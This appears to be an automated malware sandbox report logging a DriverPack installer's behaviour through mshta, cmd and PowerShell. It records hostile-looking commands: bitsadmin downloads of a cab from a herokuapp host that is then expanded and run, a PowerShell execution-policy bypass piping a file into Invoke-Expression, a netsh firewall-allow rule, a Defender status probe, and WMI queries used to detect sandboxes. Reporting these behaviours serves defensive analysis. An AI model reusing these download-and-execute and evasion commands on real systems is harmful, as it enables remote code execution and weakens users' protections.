Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT State, Name FROM Win32_Service WHERE Name="wscsvc"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT State, Name FROM Win32_Service WHERE Name="wscsvc"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT State, Name FROM Win32_Service WHERE Name="wscsvc"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT State, Name FROM Win32_Service WHERE Name="wscsvc"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT State, Name FROM Win32_Service WHERE Name="wscsvc"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT State, Name FROM Win32_Service WHERE Name="wscsvc"
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Battery
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Battery
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Battery
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Battery
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 3210 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 3295 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep count: 4117 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 4387 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\mshta.exe TID: 7352Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep count: 3127 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep count: 6274 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\92c6e2e1b8024b469ba59a029d8b5ccc.tmpJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\da26bf756ce0e246836f60c74d3d9c9b.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\devcon64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exeJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.dllJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\aria2c.exeJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\beetle-cab\7zxa.dll (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3210
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3295
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4117
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4387
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3127
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6274
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces\chat
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-chat
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces\
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile opened: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\img\assistant-faces\start-screen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NonInteractive -NoLogo -NoProfile -ExecutionPolicy Bypass "Get-Content 'C:\Users\user\AppData\Roaming\DRPSu\temp\ps.lluon6kn.jqa89.cmd.txt' -Wait | Invoke-Expression"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "c:\users\user\appdata\local\temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /v /c:"bitsadmin version" /c:"bits administration" /c:"(c) copyright" /c:"bitsadmin is deprecated" /c:"administrative tools" | findstr /r /v "^$" > "c:\users\user\appdata\local\temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /v /c:"bitsadmin version" /c:"bits administration" /c:"(c) copyright" /c:"bitsadmin is deprecated" /c:"administrative tools" | findstr /r /v "^$" > "c:\users\user\appdata\local\temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /v /c:"bitsadmin version" /c:"bits administration" /c:"(c) copyright" /c:"bitsadmin is deprecated" /c:"administrative tools" | findstr /r /v "^$" > "c:\users\user\appdata\local\temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "c:\users\user\appdata\local\temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /v /c:"bitsadmin version" /c:"bits administration" /c:"(c) copyright" /c:"bitsadmin is deprecated" /c:"administrative tools" | findstr /r /v "^$" > "c:\users\user\appdata\local\temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c c:\users\user\appdata\local\temp\beetle-cab\7za.exe x -y -aoa -pbeetle "c:\users\user\appdata\local\temp\beetle-cab\arc.7z" -o"c:\users\user\appdata\local\temp\beetle-cab\driverpack" > "c:\users\user\appdata\local\temp\dwnl_48795\log_7zip.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /v /c:"bitsadmin version" /c:"bits administration" /c:"(c) copyright" /c:"bitsadmin is deprecated" /c:"administrative tools" | findstr /r /v "^$" > "c:\users\user\appdata\local\temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /v /c:"bitsadmin version" /c:"bits administration" /c:"(c) copyright" /c:"bitsadmin is deprecated" /c:"administrative tools" | findstr /r /v "^$" > "c:\users\user\appdata\local\temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c c:\users\user\appdata\local\temp\beetle-cab\7za.exe x -y -aoa -pbeetle "c:\users\user\appdata\local\temp\beetle-cab\arc.7z" -o"c:\users\user\appdata\local\temp\beetle-cab\driverpack" > "c:\users\user\appdata\local\temp\dwnl_48795\log_7zip.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c powershell -noninteractive -nologo -noprofile -executionpolicy bypass "get-content 'c:\users\user\appdata\roaming\drpsu\temp\ps.lluon6kn.jqa89.cmd.txt' -wait | invoke-expression" > "c:\users\user\appdata\roaming\drpsu\temp\ps.lluon6kn.jqa89.stdout.log" 2> "c:\users\user\appdata\roaming\drpsu\temp\ps.lluon6kn.jqa89.stderr.log
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c "netsh advfirewall firewall add rule name="driverpack aria2c.exe" dir=in action=allow program="c:\users\user\appdata\local\temp\beetle-cab\driverpack\tools\aria2c.exe" || echo done & call echo done %^errorlevel% > "c:\users\user\appdata\roaming\drpsu\temp\run_command_84501.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_68896.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_68896.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-initial-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_40078.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_40078.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-loaded-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_58899.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_58899.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-setup-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_70521.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_70521.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_68896.log"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-initial-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_40078.log"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-loaded-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_58899.log"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-setup-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_70521.log"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c powershell -noninteractive -nologo -noprofile -executionpolicy bypass "get-content 'c:\users\user\appdata\roaming\drpsu\temp\ps.lluon6kn.jqa89.cmd.txt' -wait | invoke-expression" > "c:\users\user\appdata\roaming\drpsu\temp\ps.lluon6kn.jqa89.stdout.log" 2> "c:\users\user\appdata\roaming\drpsu\temp\ps.lluon6kn.jqa89.stderr.log
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c "netsh advfirewall firewall add rule name="driverpack aria2c.exe" dir=in action=allow program="c:\users\user\appdata\local\temp\beetle-cab\driverpack\tools\aria2c.exe" || echo done & call echo done %^errorlevel% > "c:\users\user\appdata\roaming\drpsu\temp\run_command_84501.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_68896.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_68896.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-initial-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_40078.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_40078.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-loaded-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_58899.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_58899.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="c:\users\user\appdata\local\temp\beetle-cab\driverpack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/start-setup-1.mp3" -o "c:\users\user\appdata\roaming\drpsu\temp\wget_log_70521.log" & echo done > "c:\users\user\appdata\roaming\drpsu\temp\wget_finished_70521.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_defenderVersionPowershell.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c expand "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" -F:* C:\Users\user\AppData\Local\Temp > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_expand.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_7zip.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
